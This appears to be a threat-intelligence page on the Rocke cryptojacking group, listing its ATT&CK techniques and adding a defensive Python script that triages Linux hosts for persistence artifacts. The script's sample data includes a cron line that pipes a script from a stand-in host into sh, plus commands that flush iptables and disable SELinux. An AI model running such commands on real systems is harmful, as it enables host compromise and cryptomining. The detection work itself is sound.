Description
[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address "[email protected]" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)
Techniques Used (TTPs)
- T1190 — Exploit Public-Facing Application (initial-access)
- T1014 — Rootkit (defense-evasion)
- T1027 — Obfuscated Files or Information (defense-evasion)
- T1102 — Web Service (command-and-control)
- T1562.004 — Disable or Modify System Firewall (defense-evasion)
- T1059.004 — Unix Shell (execution)
- T1082 — System Information Discovery (discovery)
- T1071 — Application Layer Protocol (command-and-control)
- T1105 — Ingress Tool Transfer (command-and-control)
- T1496.001 — Compute Hijacking (impact)
- T1027.004 — Compile After Delivery (defense-evasion)
- T1574.006 — Dynamic Linker Hijacking (persistence, privilege-escalation, defense-evasion)
- T1564.001 — Hidden Files and Directories (defense-evasion)
- T1053.003 — Cron (execution, persistence, privilege-escalation)
- T1059.006 — Python (execution)
- T1046 — Network Service Discovery (discovery)
- T1055.002 — Portable Executable Injection (defense-evasion, privilege-escalation)
- T1102.001 — Dead Drop Resolver (command-and-control)
- T1037 — Boot or Logon Initialization Scripts (persistence, privilege-escalation)
- T1027.002 — Software Packing (defense-evasion)
- T1070.002 — Clear Linux or Mac System Logs (defense-evasion)
- T1547.001 — Registry Run Keys / Startup Folder (persistence, privilege-escalation)
- T1222.002 — Linux and Mac File and Directory Permissions Modification (defense-evasion)
- T1057 — Process Discovery (discovery)
- T1543.002 — Systemd Service (persistence, privilege-escalation)
- T1018 — Remote System Discovery (discovery)
- T1140 — Deobfuscate/Decode Files or Information (defense-evasion)
- T1562.001 — Disable or Modify Tools (defense-evasion)
- T1552.004 — Private Keys (credential-access)
- T1070.004 — File Deletion (defense-evasion)
- T1071.001 — Web Protocols (command-and-control)
- T1571 — Non-Standard Port (command-and-control)
- T1021.004 — SSH (lateral-movement)
- T1070.006 — Timestomp (defense-evasion)
- T1036.005 — Match Legitimate Resource Name or Location (defense-evasion)
- T1518.001 — Security Software Discovery (discovery)
Total TTPs: 36
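Several of the Linux persistence and defense-evasion techniques in the list above (T1574.006, T1053.003, T1543.002, T1564.001, T1562.004, T1562.001, with T1105 implied by download-and-execute cron entries) leave artifacts that can be checked from a handful of files on a host. The triage script below is an added example written for this page; it is not from the ATT&CK entry, the cited Talos report, or Rocke's own tooling, and it does not encode any Rocke indicators. It maps generic signs of each technique to the technique ID, and runs on constructed artifact contents with hypothetical paths and hostnames so it works offline; the Windows techniques in the list (T1055.002, T1547.001) are out of its scope.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str  # ATT&CK technique ID from the list above
    source: str     # artifact the flagged line came from
    detail: str


# T1574.006 Dynamic Linker Hijacking: every non-comment path in
# /etc/ld.so.preload is loaded into all dynamically linked processes, so any
# entry on a server that should not have one deserves a look.
def check_ld_preload(contents, source="/etc/ld.so.preload"):
    findings = []
    for raw in contents.splitlines():
        path = raw.strip()
        if path and not path.startswith("#"):
            findings.append(Finding("T1574.006", source, f"preloaded library: {path}"))
    return findings


# T1053.003 Cron (and T1105): a job that fetches remote content and pipes it
# straight into a shell. T1564.001: a dot-prefixed path component.
DOWNLOAD_EXEC = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")
HIDDEN_PATH = re.compile(r"(?:^|/)\.[^/\s]+")


def check_cron(contents, source):
    findings = []
    for raw in contents.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if DOWNLOAD_EXEC.search(line):
            findings.append(Finding("T1053.003", source, f"download-and-execute entry: {line}"))
        if HIDDEN_PATH.search(line):
            findings.append(Finding("T1564.001", source, f"entry references hidden path: {line}"))
    return findings


# T1543.002 Systemd Service: a unit whose ExecStart runs a binary outside the
# usual packaged locations (tuned per distro; this list is an assumption).
TRUSTED_BIN = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/libexec/")


def check_systemd_unit(contents, source):
    findings = []
    for raw in contents.splitlines():
        line = raw.strip()
        if not line.startswith("ExecStart="):
            continue
        cmd = line.split("=", 1)[1].strip().lstrip("-@+!:")  # drop systemd exec prefixes
        exe = cmd.split()[0] if cmd else ""
        if not exe.startswith(TRUSTED_BIN):
            findings.append(Finding("T1543.002", source, f"ExecStart outside packaged paths: {exe}"))
        if HIDDEN_PATH.search(exe):
            findings.append(Finding("T1564.001", source, f"service binary in hidden path: {exe}"))
    return findings


# T1562.004 / T1562.001: shell lines that flush the host firewall or switch
# SELinux to permissive, the kind of "prep" a dropper runs before a miner.
DEFENSE_OFF = [
    (re.compile(r"\biptables\s+(?:-t\s+\S+\s+)?-F\b"), "T1562.004", "iptables rules flushed"),
    (re.compile(r"\bufw\s+disable\b"), "T1562.004", "ufw disabled"),
    (re.compile(r"\bsetenforce\s+0\b"), "T1562.001", "SELinux set to permissive"),
]


def check_shell_script(contents, source):
    findings = []
    for raw in contents.splitlines():
        line = raw.strip()
        for pattern, tid, why in DEFENSE_OFF:
            if pattern.search(line):
                findings.append(Finding(tid, source, f"{why}: {line}"))
    return findings


def triage(artifacts):
    """artifacts: {path: file contents}. Dispatch on the path shape."""
    findings = []
    for path, contents in artifacts.items():
        if path == "/etc/ld.so.preload":
            findings += check_ld_preload(contents, path)
        elif "/cron" in path:
            findings += check_cron(contents, path)
        elif path.endswith(".service"):
            findings += check_systemd_unit(contents, path)
        elif path.endswith(".sh"):
            findings += check_shell_script(contents, path)
    return findings


# Constructed sample artifacts: hypothetical paths and hosts, not real IOCs.
SAMPLE = {
    "/etc/ld.so.preload": "/usr/local/lib/libsystem.so\n",
    "/etc/cron.d/example": "*/15 * * * * root (curl -fsSL http://dropper.example/x.sh "
                           "|| wget -q -O- http://dropper.example/x.sh) | sh\n",
    "/var/spool/cron/root": "# m h dom mon dow command\n0 2 * * * /tmp/.cache/run\n",
    "/etc/systemd/system/example.service": "[Unit]\nDescription=x\n[Service]\n"
                                           "ExecStart=/tmp/.cache/daemon\nRestart=always\n",
    "/tmp/x.sh": "iptables -F\nsetenforce 0\n",
}

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f.technique:<10} {f.source:<38} {f.detail}")
```

On a live host, feed `triage` the real contents of `/etc/ld.so.preload`, `/etc/crontab`, `/etc/cron.d/*`, `/var/spool/cron/*`, `/etc/systemd/system/*.service` and any scripts those entries point at; the regexes are deliberately narrow, so treat a hit as a lead to pull the referenced file and its timestamps (the list also includes T1070.006 Timestomp, so compare against package manager records rather than trusting mtime alone).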